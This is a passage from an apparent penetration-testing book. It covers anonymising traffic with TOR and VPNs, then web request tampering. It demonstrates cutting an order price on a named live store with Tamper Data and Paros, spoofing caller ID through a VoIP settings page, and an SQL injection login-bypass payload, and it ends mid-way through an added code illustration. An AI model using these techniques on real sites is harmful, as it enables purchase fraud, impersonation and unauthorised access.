Many people have the misconception that TOR will provide them end-to-end encryption. While this sounds great, it is not actually the case. Unlike a VPN, TOR is not encrypted from end to end. While TOR traffic is encrypted when it exits from your LAN, at some point out there on the wide area network (WAN) your traffic will become unencrypted. This unencrypted point in the communication link is referred to as the exit node. TOR gives you the ability to act as a relay, which could result in you being an exit node for traffic. This is not the default, for good reason. Never, ever, choose to be a relay, as this may result in you becoming an exit node for the TOR network. Here are two reasons why you should never choose to be a relay: 


1. Someone could do something bad and it might get tied back to you. 

2. If you decide to hack and run a sniffer, your captures may contain illegal files or contraband. If you carve out the files and see something you don't want to see, you will likely never be able to forget what you saw. Don't do it! Do I have to spell it out? 


The easiest way to use TOR is to install the Vidalia bundle. The latest version of the Vidalia bundle is available at the following link: http://www.torproject.org/dist/vidalia-bundles/. The latest version available for download at the time I wrote this chapter was 0.2.1.26-0.2.10. Download the EXE for Windows (all versions) and the DMG file for Mac OS X. The install of Vidalia will include Vidalia, TOR, Polipo, and the TOR button for Firefox. 


Vidalia Bundle Setup, Choose Components: check the components you want to install and uncheck the components you don't want to install, then click Next. Components: Vidalia 0.2.10, Tor 0.2.1.26, Polipo 1.0.4.1, Torbutton 1.2.5. Space required: 26.9 MB. Vidalia Bundle 0.2.1.26-0.2.10 (Rev. 1). 


After installing TOR, wait to receive the message that you are connected to the TOR network. 

If you are having trouble connecting, be sure to verify that your time and date are correct. A red or yellow onion in the right hand corner of the taskbar means your TOR connection is not working properly. A green onion in your taskbar means you have successfully connected to the TOR network. 
Open the Firefox browser and click the red TOR DISABLED button in order to change the status to TOR ENABLED. The TOR button will turn green when TOR is enabled. Once you are connected to the TOR network, you may notice that you are not in Kansas anymore, Dorothy. In this example, my home page Google, which is normally English, turns to Slovak. 


Firefox with TOR enabled: the home page loads as google.sk, the Slovak Google (Web, Obrázky, Mapy, Prekladač, Blogy, Aktualizácie, Gmail; Hľadať v Google | Skúsim šťastie). The Torbutton status bar reads Tor Enabled, United States 72.14.204.103 Google Inc, 72.81.255.124. 


Another option is using free VPN software, which offers you both IP address obfuscation and encryption. Some of the free VPN clients include 

■ ProXPN 
■ AlonWeb 
■ PacketiX.NET 
■ Hotspot Shield 
■ UltraVPN 
■ FreeVPN 
■ CyberGhost 
■ Always VPN 


Using a free VPN usually involves installing the software and signing in with a username and password. When a person uses VPN software, an extra network card will appear in their network connections, usually referred to as a Tun/Tap device. Some of the software you install may contain spyware, so use caution if you decide to use them. Many of these companies usually also offer pay services that give customers added benefits. For example, FreeVPN allows pay users to select IP addresses that originate from a specific country, like China. 

CyberGhost only allows you to obtain IP addresses that originate from Germany, while ProXPN primarily offers U.S.-based IP addresses. For this reason, ProXPN is a popular choice among users from outside the United States who are trying to access services only offered to U.S.-based IPs, such as television programming. I find ProXPN to be one of the easiest and most reliable free VPN services on the market. While it is a great product, there is a danger to be aware of when you are using it or any other free VPN software. I discovered the danger by accident. See, after connecting, my hard drive light started going crazy. I realized why it was happening; I was on a private network with many other individuals. I was connected to a LAN with other users, many of whom were scanning my box and trying to enumerate information from my computer. 


ProXPN client, General tab: Connect to, User Name, Password, Don't have an account?, Remember me, Connect / Reset; Default connect to: United States. 


When you connect to the ProXPN servers, you usually receive an IP address in the 173.0.0.0/16 range. When you open mail, and connect to IRC, websites, and FTP sites, your Internet service provider (ISP) IP address will not be detected. A simple visit to IPGoat.com displays the ProXPN external IP address. 


ipGoat.com viewed through ProXPN. Current IP Address: 173.0.2.120. 
Another benefit of free VPN services is the encryption that is provided to users. If you use ProXPN at a hotel or a hotspot, people will not be able to view your traffic because you are on a completely different network than they are. However, other people on the other end of the tunnel can sniff the traffic and view your plain text traffic. In this example, I connected two machines to the ProXPN servers, pinged one machine from the other, and was able to view the traffic. 


Command prompt on one ProXPN client (173.0.2.120) pinging the other (proXPN v2.2.7, Connected to United States, IP address 173.0.3.217), with replies coming back. Wireshark capture filtered on icmp on the other machine, timestamps 2010-10-28 19:45:30 to 19:45:33: ICMP Echo (ping) requests from 173.0.2.120 to 173.0.3.217 and ICMP Echo (ping) replies from 173.0.3.217 to 173.0.2.120. 


The fact that your traffic becomes unencrypted once you get to the other end of the VPN is 
not your only concern. Once you are on another network (virtual) with other users, you will lose 
the protections of your external firewall. In the example here, a TCP scan is done against another 
machine that I connected to the network. If my machine was behind my external firewall, a scan 
like this on my machine would not be possible from the Internet. (It would, however, be possible 
and very likely on my external firewall.) A firewall on your OS will help to protect your system. 


Command prompt showing the result of the TCP scan against the other machine on the ProXPN network (proXPN v2.2.7, Connected to United States). 


If you are trying to bypass firewall restrictions and use protocols like IRC, a VPN client will get you past those filters. At the same time, however, a VPN client will expose you to harmful traffic that you might not face behind the security of your firewall. For example, my wife and I share folders and printers, as many home users do. When I enter the VPN, others may try to connect to those shares. Or, they might even try to print the Bible on our printer, wasting our ink and paper. And, even worse, if they are able to successfully compromise my machine, an attacker could move laterally through my internal network and maybe attempt to attack other devices on my home network, such as my TV and Wii. In the future, many of us will have even more IP-based devices connected to our networks, such as video camera systems, alarm systems, HVAC, and VoIP systems. If an attacker is able to penetrate your internal network, they can do some serious damage now, and possibly even more damage in the coming years. If your hard drive light starts going crazy or your system starts acting funny, 


■ Check your network connections by typing netstat -an. 
■ Run a sniffer like Wireshark and try to examine the traffic. 
■ Disconnect from the network. 


The WorldIP Firefox plug-in will show you your external IP address. If you are not using any tool 
to change your address, you will see the address provided to you by your Internet service provider. 
If you are using TOR, ProXPN, or Proxy-List.org, you will see a different IP address. 

To use the WorldIP plug-in, which will display your external IP address, 


1. Open Firefox, go to http://www.google.com and search for add-ons. 
2. In the Search box, type “WorldIP.” 
3. Click Add to Firefox and restart Firefox. 


Note that when you do not change your external IP address, it is broadcast to the world. It will 
be in the web logs of servers and can likely be traced back to you. Notice information about the 
service provider, Verizon, and the location of the IP in the Baltimore area. 


ipGoat.com with no IP-changing tool in use. Current IP Address: 72.81.255.124. Advanced: Name Address pool-72-81-255-124.bltmmd.fios.verizon.net; Remote Port 5036; Browser Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 (.NET CLR 3.5.30729); Location United States. Links: More Info | Lookup who owns an IP | Traceroutes. Firefox status bar: Tor Disabled, United States 209.200.10.10 Webair Internet Development Company Inc., 72.81.255.124. 


If you are using a tool to change your IP address, the new IP address will be displayed in the 
right-hand corner of the screen. You may need to right click on the IP and select Update External 
IP if the IP address is not matching with what you see on the IPGoat.com website. 
ipGoat.com and the WorldIP status bar both showing the changed external IP address, 173.0.2.222. 


There are also some pay services that will help you to hide your IP address. One of the more well-known pay services is called Hide My IP. The company offers a 14-day free trial of their software and it is available for download at http://www.hide-my-ip.com/. The software works on all versions of Windows and has an easy-to-use interface. When you go to the website to download the software, it informs you of your current IP address and location information. 


Your IP Address 72.81.255.124 Reveals The Following: 
You are located in Catonsville, Maryland, United States 
Your ISP is Verizon Internet Services 
Your hostname is pool-72-81-255-124.bltmmd.fios.verizon.net 


To use Hide-my-IP: 


1. Go to http://www.hide-my-ip.com/ and click Download Hide My IP. 

2. Double click on HideMyIP.exe. 

3. If you do not have version 2.0 of the .NET framework installed, click Yes to download it and 
install it. 

4. Click Next, Accept if you agree to the license terms, Next, and Next. 

5. Restart your system if you are prompted to do so. 

6. Double click on the Hide My IP shortcut on your desktop. 

7. Click Start Trial if you are using the trial version. 

8. Click Hide My IP to hide your IP address. 


Hide My IP 5.2 window. Quick Settings: Change IP Every N Minutes, Launch On Startup, Clear Cookies When IP Changes, Require US Based IP. Demo Mode notice: Hide My IP is running in demo mode; browsing speed will be slower than the full version and a limited number of IPs will be available for United States and United Kingdom; purchase for $23 to get access to the Standard IP service with several locations. Copyright 2008-2010 My Privacy Tools, Inc. 
The advanced settings allow you to encrypt, change your user agent, and enable IP history. Consider buying the software if you like it. Don't be a hacker who installs it for 14 days, then goes back to a snapshot in VMware and reinstalls it. That would be unethical and I advise against doing it. 


Summary 


When you surf the Internet, you leave indicators of who you are and where you are coming from in the web logs of servers. Hackers do not want their activity traced back to them, so they use protection mechanisms like proxy servers, VPN services, and TOR. The various methods that can be used to conceal your external ISP-assigned IP address all have their own advantages and disadvantages. Be aware that individuals within your company or organization may use these techniques to mask their activity. Being aware of the methods the bad guy uses can help you understand why it may be difficult to track culprits down and why an IP address entry in your web logs will not necessarily lead you to the perpetrator of an attack or malicious activity. 


Chapter 5 
Manipulating the Web 


Introduction 


This chapter deals with the subject of web application penetration testing. Primarily, we're talking 
about how users are able to manipulate data to and from a web page or web application for potentially 
nefarious reasons. It is important to understand that most of these attacks are specific to certain types 
of web pages, or to certain types of web applications, so finding these vulnerabilities is most often the 
result of trial and error. Because the bugs are usually not generic but tied directly to particular 
applications or specific setups, there is no "cookie cutter" approach to either exploiting these vulnerabilities 
or fixing them. We will also find (particularly in the case of SQL injection and cross-site scripting 
[XSS]) that while there are some tools that can help us automate this process, they tend to be very loud 
from the perspective of a receiving host, so your attack is likely to be detected and potentially deterred. 

Up front, we should recognize that this is one chapter about web penetration testing, a topic 
that could easily fill a book. Our goal then is to touch on a few major areas, while recognizing that 
it would be impossible to be comprehensive. There are literally hundreds of such tools we could use 
and demonstrate, but for the sake of simplicity we will just choose a few. 


Change the Price with Tamper Data 


Amazon.com founder and CEO Jeff Bezos once told a story about what he considered to be 
his favorite software bug from the very early days of Amazon.com's existence. When selecting a 
book to purchase, the customer could enter in a text box the number of such books they wanted 
to order. Unfortunately for Amazon.com, the customer could also enter a negative number, and 
Amazon.com would automatically credit the customer's credit card. 

This bug was quickly fixed, and of course Amazon.com would go on to become a powerhouse 
online retailer. You would think that, generally speaking, silly software bugs like this would also 
be fixed across the board, but (unfortunately for retailers) this just isn't the case. While you may 
not be able to order a negative number of products from an online store, many such sites still have 
vulnerabilities associated with them. And because you're dealing with products, services, and 
ultimately cash, the vulnerabilities can lead to real problems. 
Now it should be made clear that most large-scale online retailers like Amazon.com are 
thoroughly familiar with most of these issues. If you tried to repeat the demonstration in this chapter 
against these large online retailers, it is unlikely that it would work. However, there are a number 
of smaller online sites that are still problematic. Let's walk through one example where we can 
purchase a product for a different price than the one displayed on the page (in fact, whatever price 
we choose). After the walkthrough, we'll talk about why this is possible. 

The website that I'll be using for this example is ninjaremote.com, which is a real, live online 
store that sells a product called the Ninja Remote. This remote is a key fob-sized, "TV-B-Gone" 
type device that enables the owner to surreptitiously control TVs by turning them on and off, 
changing the volume, or changing the channel. This works by quickly sending over one 
thousand remote codes, the effect of which is to brute force the TV into accepting the appropriate 
commands. 


[Screenshot: the ninjaremote.com home page, "Ninja Remote - Stealth Television Gadget", open in Firefox, with the store's tongue-in-cheek preamble on the history of ninjas and why you "must use... the Ninja Remote".]


The tool that I'll be using is a Firefox plug-in called Tamper Data (https://addons.mozilla.org/ 
en-US/firefox/addon/966/). Tamper Data sets up your browser as a proxy server, which allows you 
to view and modify HTTP/HTTPS headers and POST parameters. What this means is that when 
data is sent from your computer to the target website, we can actually view and modify the data 
before it gets sent. 


[Screenshot: the Tamper Data 11.01 add-on page on addons.mozilla.org, by Adam Judson: "Use tamperdata to view and modify HTTP/HTTPS headers and post parameters." Updated February 11, 2010; website http://tamperdata.mozdev.org; works with Firefox 3.5 - 3.6.*; 71 reviews; 2,950,769 downloads.]
Let's first visit www.ninjaremote.com and see how the website should operate normally. 


[Screenshot: the ninjaremote.com purchase options, each with "Buy Now USA & Canada" and "Buy Now International" buttons: 5 Ninja Remotes, USA & Canada $39.95 + $10 shipping, International $48 + $27 shipping; 3 Ninja Remotes, USA & Canada $26.95 + $10 shipping, International $26.95 + $27 shipping; 2 Ninja Remotes, USA & Canada $19.95 + $7 shipping, International $19.95 + $21 shipping.]


When you scroll down the page, you find a number of purchase options. In this example, we're 
looking for the best value, so we want to purchase five Ninja Remotes for $39.95 plus $10 shipping 
(this is the top left button). If we click on this button, we are taken to the order page. 


[Screenshot: the "Complete Your Purchase" order page, with a link to use PayPal or Google Checkout instead, the Amount field already populated, and Billing Address and Shipping Address sections.]


In this image you can see that the price of $49.95 has populated the Amount box, and I 
highlighted it with my cursor. It should be said that this field is not editable at this point. Filling in the 
remainder of the required information is standard, and this would lead to a completely normal 
purchase procedure. However, let's go back to the previous page and invoke Tamper Data's 
capabilities. First, here are the purchase options: 


[Screenshot: the "Buy It Now" section of ninjaremote.com showing the 5 Ninja Remotes option: USA & Canada $39.95 + $10 shipping, International $48 + $27 shipping.]
Now before we go any further, let's start Tamper Data. From the Tools menu, select Tamper 
Data and the following popup will appear: 


[Screenshot: the "Tamper Data - Ongoing requests" window, with Start Tamper, Stop Tamper and Clear buttons, a Filter box, a request list with columns Time, Duration, Total Duration, Size, Method, Status, Content Type, URL and Load Flags, and panes for request and response header names and values.]


We can browse at will, but Tamper Data will not intercept any data until we click Start 
Tamper. So let’s start Tamper Data and then return to the purchase options. When we click on 
the Buy Now link, the browser pauses because the HTTP/HTTPS headers and post parameters 
are sitting inside the Tamper Data extension waiting for you to view and modify. The page to 
complete your purchase doesn’t appear yet, because it is still waiting for your data. When we click 
on the Buy Now link, Tamper Data asks us what we want to do. 


[Screenshot: the "Tamper with request?" dialog for https://www.ninjagizmos.com/payments/payments.aspx, with a "Continue Tampering?" check box and Tamper, Submit and Abort buttons.]


“Tamper” allows us to view and modify the request data. “Submit” sends the data “as-is” and 
“Abort” ignores the data. So let us select Tamper and see what data we are able to view. 


[Screenshot: the Tamper Data popup for https://www.ninjagizmos.com/payments/payments.aspx. The left pane lists the request headers (Host www.ninjagizmos.com, User-Agent Mozilla/5.0 (Windows; U; Windows NT 6...), Accept, Accept-Language en-us,en;q=0.5, Accept-Encoding gzip,deflate, Accept-Charset ISO-8859-1,utf-8;q=0.7,*;q=0.7, Keep-Alive 115, Connection keep-alive, Referer http://www.ninjaremote.com/, and a Cookie carrying the ASP.NET_SessionId). The right pane lists the POST parameters: store=5, amount (highlighted), shipamount=3, description=5+Ninja+Remotes.]
The left side of the Tamper Data popup shows the request header names and values. 
For our purposes in this example, it is not necessary to modify any of this data. On the other hand, 
the right side of the popup contains POST parameter names and values that are clearly of interest to 
us. The "store" value indicates the number of products we're asking to purchase. If we wanted to, we 
could change this and submit the data to purchase more than five remotes for the same price. The 
"amount" field (highlighted) is the total price of our purchase including shipping (remember $39.95 
plus $10 shipping). Also recall that this is the value that populated the field on the order page. 

The difference here is that Tamper Data allows us to modify any of this data that was previously 
not available to us. So if we change the values in Tamper Data, these are the values that are sent to 
the order page. In this demonstration, let's change the “amount” field to $4.95 instead of $49.95. 


[Screenshot: the same Tamper Data popup for https://www.ninjagizmos.com/payments/payments.aspx, with the request headers on the left and the POST parameters on the right: store=5, amount (being edited), shipamount=3, description=5+Ninja+Remotes, and OK and Cancel buttons.]


When we click OK all of this data is sent back to the website's order page. Here is the result: 


[Screenshot: the ninjagizmos.com "Ninja Remote - Purchase" page after tampering. The "Complete Your Purchase" form shows the Amount field populated from the modified POST data, along with Card Number, Month/Year, Country and Email fields, and the VeriSign and PayPal seals.]
You can see in this example that the "amount" is now $4.95 instead of $49.95. Again, this field 
is not editable at this point. If we were to continue this purchase, it would be processed like 
any other order. Now a reasonable person might ask: Won't the people processing the order notice 
this discrepancy? It is possible they might. It might be seen as an error, or it might be overlooked 
by accident. But that is a human factor that is beyond the scope of this demonstration. The 
problem here is that the website, complete with its VeriSign logo and PayPal seal, is vulnerable to its 
data being modified. 

The real issue here is one of server-side validation, or perhaps better stated, the lack of it. The 
server processing the order data should not permit the user to change or modify certain data. The 
server should be validating the data to ensure that such modifications are not taking place. If this 
occurred, we would get some sort of an error, or a request to the user to enter valid data, instead 
of a perfectly normal-looking order page. 
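As an added illustration (not code from the book or from the store being discussed), here is what the missing server-side validation looks like in Python: an order handler that bills whatever "amount" the browser posted, beside one that recomputes the total from the quantity using prices the server holds. The bundle table and the form field names are constructed to mirror the purchase options and POST parameters shown above.

```python
from decimal import Decimal, InvalidOperation

# Constructed server-side price table for the USA & Canada bundles shown on
# the purchase page: bundle size -> (price, shipping). A real store would load
# this from its database; the table is this example's assumption.
BUNDLES = {
    5: (Decimal("39.95"), Decimal("10.00")),
    3: (Decimal("26.95"), Decimal("10.00")),
    2: (Decimal("19.95"), Decimal("7.00")),
}


def expected_total(quantity):
    """Authoritative order total, computed only from server-held prices."""
    price, shipping = BUNDLES[quantity]
    return price + shipping


def process_order_trusting(form):
    """The pattern the chapter exposes: the server bills whatever 'amount'
    the browser posted, so a request edited in a proxy is accepted as-is."""
    return {"accepted": True, "charge": Decimal(form["amount"])}


def process_order_validated(form):
    """Hardened handler: the quantity is the only client input that matters.
    The total is recomputed on the server and a posted 'amount' that
    disagrees is rejected; the mismatch is also worth logging, because a
    browser never produces it on its own."""
    try:
        quantity = int(form["store"])
        posted_amount = Decimal(form["amount"])
    except (KeyError, ValueError, InvalidOperation):
        return {"accepted": False, "error": "malformed order"}
    if quantity <= 0:
        # Covers the negative-quantity bug from the Amazon anecdote.
        return {"accepted": False, "error": "quantity must be positive"}
    if quantity not in BUNDLES:
        return {"accepted": False, "error": "unknown bundle"}
    total = expected_total(quantity)
    if posted_amount != total:
        return {"accepted": False, "error": "amount mismatch",
                "posted": posted_amount, "expected": total}
    return {"accepted": True, "charge": total}


# Constructed POST bodies modelled on the parameters seen in Tamper Data.
LEGIT_FORM = {"store": "5", "amount": "49.95",
              "description": "5 Ninja Remotes"}
TAMPERED_FORM = dict(LEGIT_FORM, amount="4.95")

if __name__ == "__main__":
    print("trusting handler: ", process_order_trusting(TAMPERED_FORM))
    print("validated handler:", process_order_validated(TAMPERED_FORM))
```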

This same issue may or may not work on other pages; since every online store is different you 
might have to try different things to see how they work. Again, it should be obvious that this is 
unlikely to work on large online stores, but there are plenty of other vulnerable places out there. 

Finally, it should be pointed out that other similar proxy-type tools can be used for the same 
purposes; I selected Tamper Data because it is browser-based and easy to use and demonstrate. 
What I like about Tamper Data is that because it is a browser extension, I don't have to make any 
changes to my browser settings to use it; everything is done automatically. Furthermore, because it 
is a browser extension, it is operating system (OS) independent. In the next section, I'll talk about 
a similar tool called Paros Proxy. 


Paros Proxy 


Paros Proxy ("Paros") is another similar proxy tool useful for man-in-the-middle (MITM) 
applications. As opposed to Tamper Data, Paros is a standalone Java-based application. Accordingly, 
Paros should work in any Java-supported environment. 


[Screenshot: the Paros Proxy main window, with File, Edit, View, Analyse, Report, Tools and Help menus, a Sites pane on the left, and Request, Response and Trap tabs on the right.]


Since Paros is a standalone application, there are some setup requirements necessary to use it 
in a browser-based environment. More specifically, we have to tell our browser to send the data to 
Paros before it gets sent on to our target site. If we navigate to Tools, Options, Local Proxy, we find 
the default proxy settings for Paros: 


[Screenshot: the Paros Local proxy options: Address (eg localhost, 127.0.0.1) = localhost; Port (eg 8080) = 8080. "Set your browser proxy setting using the above. The http port and https port must be the same port as above."]


Generally speaking, you can keep these settings as is (unless of course you're already running 
something else on port 8080). Either way, just take note of your settings so we can configure the 
browser to use them. As a side note, while we demonstrate how to set up Paros here, any 
standalone program will require you to configure it and/or your browser to work together. 

First, let us review the manual method. This is user intensive, but we'll cover it for the sake of 
being comprehensive. In our browser (again, we're using Firefox), select Tools, Options, Advanced, 
Network, and click on Settings next to “Configure How Firefox Connects to the Internet.” Under 
manual proxy configuration, enter the settings as "localhost" and port “8080”: 


[Screenshot: the Firefox "Configure Proxies to Access the Internet" dialog with "Manual proxy configuration" selected: HTTP Proxy localhost, Port 8080; SSL Proxy localhost, Port 8080; FTP, Gopher and SOCKS proxies left blank; a "No Proxy for" list (example: .mozilla.org, .net.nz, 192.168.1.0/24); and the alternative "Automatic proxy configuration URL" option.]
Once we click OK, this directs all of our data through Paros, which is listening on localhost 
port 8080. Now we have access to all of the data, and we can view and modify things as we please. 
In this case you truly are a man in the middle. The difficulty here is that we have to manually 
change the proxy settings back and forth every time we want to use Paros. 

A much easier method of managing proxies (especially if you use more than one) is one of 
the many proxy extensions for Firefox. I prefer FoxyProxy (https://addons.mozilla.org/en-US/ 
firefox/addon/2464/) but many others are available. In this case, FoxyProxy allows us to set 
up multiple proxy configurations and then enable and disable them at the click of a button. 
So if you have more than one proxy tool, or if you use TOR or other similar services, you can 
manage them very easily. FoxyProxy stores my settings ("localhost" and port "8080"), and I 
can label the settings and enable them at will without fussing with any manual configuration 
changes. 

Once Paros is configured, the data passing through the proxy is logged and collected, but not 
modified. The sites that you visit will be logged in the left window, and the request and response 
data will be collected in the right window. As an example, I configured my iPhone to use Paros 
and collected the following request data: 


[Screenshot: the Paros Request tab showing a POST to http://iphone-wu.apple.com/dgw?imei=...&apptype=weather&t=4 HTTP/1.1 with headers Host: iphone-wu.apple.com, User-Agent: Apple iPhone v2.2 Weather v1.0.0.5G77, Accept: */*, Accept-Language: en-us, Content-Type: text/xml, a Cookie, Content-Length: 347, Connection: keep-alive and Proxy-Connection: keep-alive. The XML body is a <request api="weather"> containing <query type="getforecastbylocationid"> with <list><id>USMD0181</id></list>, <language>en_US</language> and <unit>f</unit>. The Sites pane lists requests to weather.yahooapis.com/forecastrss?p=USMD0181&u=f, iphone-wu.apple.com/dgw and a webmail ActiveSync URL.]


In the Request tab of the right window is a POST to iphone-wu.apple.com asking for a weather 
update. Next we see the response: 
[Screenshot: the Paros Response tab. Headers: Date: Sun, 08 Aug 2010 22:33:01 GMT, X-YSTATUS: 200, Cache-Control: private, Connection: close, Content-Type: text/plain;charset=UTF-8. The XML body is a <response> with <result type="getforecastbylocationid"> for location id USMD0181, city Glen Burnie, MD, United States, units F/mi/in/mph, wind chill 87, humidity 44, visibility 10.00, pressure 29.96, <condition code="30" text="Partly Cloudy" temp="87" time="1754">, and a series of <forecast> elements (e.g. dayofweek 1, low 70, high 90, "Partly Cloudy"; dayofweek 2, low 73, high 94, "Mostly Sunny"; and so on through the week).]


In the Response tab of the right window, we see the HTTP header and response data. If we 
visually parse the large amount of XML data in the middle of the screen, we can pick out specific 
elements of the weather data. Now for a little bit of fun: Can we change this data? Of course we 
can. If we move to the Trap tab of the right window, we see check boxes for Trap request and Trap 
response: 


[Screenshot: the Paros Trap tab showing a later weather POST to http://iphone-wu.apple.com/dgw?imei=...&apptype=weather&t=3 HTTP/1.1 from User-Agent: Apple iPhone v3.1.2 Weather v1.0.0.7D11 (Content-Type: text/xml, Content-Length: 359), with the same <request>/<query type="getforecastbylocationid"> XML body, a "Raw View" selector, and the "Trap request" and "Trap response" check boxes. The Sites pane again lists weather.yahooapis.com, iphone-wu.apple.com and a webmail ActiveSync URL.]
Now when the iPhone weather app asks for an update, we can view and modify the request 
and response. In this particular case, we want the request to move on untouched, and want to 
modify the response before it reaches the phone. I changed the current temperature from 87 
degrees to 127 degrees and continued the request. The result on my phone is shown here: 


[Screenshot: the iPhone Weather app for Glen Burnie showing the modified current temperature, H: 90° L: 70°, the Sunday through Friday forecast, and "Updated 8/8/10 6:59 PM".]


Ouch, that's pretty hot! Changing the temperature is a fun example, but there are obviously 
options with more malicious potential. Just for the sake of compatibility, I repeated the Ninja 
Remote price change demonstration with Paros. The steps are a little bit different since Paros 
works outside of the browser environment, but the results are the same: 


[Screenshot: the Paros Trap tab showing POST https://www.ninjagizmos.com/payments/payments.aspx HTTP/1.1 with headers Host: www.ninjagizmos.com, User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Language: en-us,en;q=0.5, Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7, Keep-Alive: 115, Connection: keep-alive, Referer: http://www.ninjaremote.com/, and a Cookie carrying affil=0 and the ASP.NET_SessionId. The body reads a=&store=5&amount=(highlighted)&shipamount=3&description=5+Ninja+Remotes, and "Trap request" is checked.]


As you can see in the Trap box, our POST parameter values are there for the editing. Changing 
the “amount” value and selecting Continue has the same result as it does in Tamper Data. Tools 
like Paros Proxy or Tamper Data could also be used for manipulating the results of online polls. 
In poorly coded polls that send a POST parameter with a vote value of +1 (or something along 
those lines), the attacker could potentially add (or even subtract) an unlimited number of votes by 
editing that value. Reputable online polls should not allow you to do this, but there are certainly 
many other opportunities out there. 

Let me share one other example of how Paros Proxy can be useful for modifying data. In this 
case the data in question was not a price, as it was with Tamper Data, but a phone 
number. One of my previous ISPs was a small regional company that also offered VoIP services. 
Conveniently for its customers, the ISP provided a web interface where users could change various 
settings. One of the more interesting features was the ability to set the outgoing caller ID. For 
example, if a user had multiple lines, the web page would have a drop-down box listing the 
multiple numbers, and you could select which number you wanted to go out as your caller ID. This 
would be particularly useful if you only wanted to share one outgoing phone number and protect 
your other "internal" numbers. 

For most customers with only one phone number, the drop-down box simply contained that 
one number and there was no significance to changing anything because there was only one 
option. I thought, however, that Paros might be useful in this circumstance. And in this case, I was 
right. 

In this example I allowed my original (real) number to be selected in the drop down box, 
started Paros, and then submitted the request. The Paros Trap box included a number of options, 
and one of them was a string of data, which contained this original outgoing phone number. 
So it appeared that, at a minimum, I could at least change the number. And indeed, I was able 
to change the number. The newly refreshed web interface now showed the modified outgoing 
number. 

In this case, we could control what data was being sent via the web interface, but it was another 
question entirely as to whether the modified outgoing number would actually work. Fortunately 
(for me anyhow), it did. When I called a third-party number, the caller ID that was displayed to 
them was indeed the modified outgoing number that I invoked with Paros. So instead of changing 
a price, I was able to spoof caller ID by modifying the data in the web interface page. 

Again, as with Tamper Data, there are other proxy options like SPIKE Proxy, Burp Suite, and 
others. Many of these programs have similar features, and some of them have options the 
others lack. Their mention (or lack thereof) here should not be considered an endorsement of one 
option over another, but rather just an author preference. 


Firebug 


Firebug is a web development add-on for Firefox (https://addons.mozilla.org/en-US/firefox/ 
addon/1843/). Firebug allows you to inspect, edit, debug, and monitor HTML, CSS, and 
JavaScript in real time, as well as accurately analyze network usage and performance. Firebug also 
has over 40 individual extensions that work directly with Firebug to enhance its capabilities. 

While Firebug was originally created as a web developer's tool, creative penetration testers have 
used Firebug to find many cross-site scripting (XSS) and cross-site request forgery (XSRF) 
vulnerabilities. Firebug is also useful in searching for ways to break client-side input validation in target 
web pages or web applications. 
SQL Injection 


SQL injection is a vulnerability associated with the ability of a user to input data directly to an 
underlying database to execute commands within that database. Ultimately, the user may be able 
to access, add, change, or delete data within the database without any authorization. Injection 
attacks were rated by the Open Web Application Security Project (OWASP) as the number one 
web application security risk. 

One could write an entire book on SQL injection (indeed, some already have), but we have 
one section of one chapter, so our discussion will not attempt to be comprehensive. Rather, we can 
show a few common examples to demonstrate the overall concept. The vulnerability associated 
with SQL injection is specific to how user input is handled. When certain escape characters are 
incorrectly filtered, the user input is executed as part of the query. It is also important to note that the web 
application code, not the database service, is the source of the vulnerability. Let's take a look at an example. In the 
example that follows, we'll be entering our SQL injection attack into a form, but many such 
attacks can also be executed by entering commands via the address bar. 


[Screenshot: a login form with Username and Password fields, a "Remember Me" check box, a Log In button, and "Register | Lost your password?" links.]


To understand how an SQL injection attack works, it is necessary to understand what 
information is sent when a user enters their username and password into a form. In this form, when the 
user clicks Log In, the following information is sent from the web front end directly to the SQL 
database: 


'SELECT * FROM Users WHERE Username = input AND Password = input' 


In this case, whatever text is typed into the username box is inserted into the first input space, and 
likewise for the password. How do we determine this? There are a number of ways, but the most 
common are viewing the source of the web page, trial and error, and research. Furthermore, 
determining the type of SQL database (MySQL, Microsoft SQL, Oracle, etc.) can be useful in 
determining the exact language syntax, as the difference between an attack working or not is very specific to the 
database, its syntax, and characters. It should also be stated at this point that this is an example of 
extremely poor coding that you would be unlikely to encounter in an enterprise environment (and 
if you should, you might have bigger problems). 
Let's examine how a normal login would occur: 


[Screenshot: the login form filled in with Username "Bob" and a masked password, with "Remember Me", Log In, and "Register | Lost your password?".]


In this example, the command that is sent from the web interface to the SQL database is as follows: 


'SELECT * FROM Users WHERE Username = Bob AND Password = password' 


The pseudo-English translation of this statement would be something like: select all users from the table 
"Users" where the username is equal to Bob and the password is equal to password. Note of course in this 
crude example that the password is not even being hashed; in most cases the web application will hash 
the password and match it to a password hash in the database (or something similar). Most databases do 
not store passwords as clear text. By having some basic knowledge of the SQL language, we can abuse 
poorly written code to execute commands in the SQL database. Consider the following example: 


[Screenshot: the login form with the Username field set to Anyuser' OR 1=1--; and the Password field left empty.]


In this example, the command that is sent from the web interface to the SQL database is as 
follows: 


'SELECT * FROM Users WHERE Username = Anyuser' OR 1=1--; 


Notice that this is a very different command; we didn’t even enter a password. The translation of this 
statement is equivalent to: select all users from the table “Users” where the username is equal to Anyuser 
or 1 is equal to 1. Let's examine this in a little more detail. First, we are asking the database to find a user 
named Anyuser. The user Anyuser could be any user, or no user; in this case it doesn’t matter because 
of how we crafted the remainder of the command. Second, the ' after Anyuser is not correctly filtered. 
Third, we created an OR statement (1 = 1), which is always true. Lastly, the double hyphen terminates 
the query. This statement is always true, and in this case, will log us into the first account on the system 
(which is most often the administrator) without any requirement for a password. 
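An added illustration, not from the book, of the two queries above run against a small constructed SQLite table: the vulnerable login concatenates the username into the SQL text exactly as the chapter describes, so the chapter's payload comments out the password check and matches the first row; the parameterized version passes the same input as data. The table contents and the use of Python's sqlite3 module are this example's assumptions.

```python
import sqlite3


def make_db():
    """Constructed Users table for the demonstration. Passwords are kept in
    clear text only to mirror the chapter's deliberately crude example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret-admin-pw"), ("Bob", "password")])
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """Builds the statement by string concatenation: whatever the user types
    lands inside the SQL text, quotes and all."""
    return ("SELECT * FROM Users WHERE Username = '" + username +
            "' AND Password = '" + password + "'")


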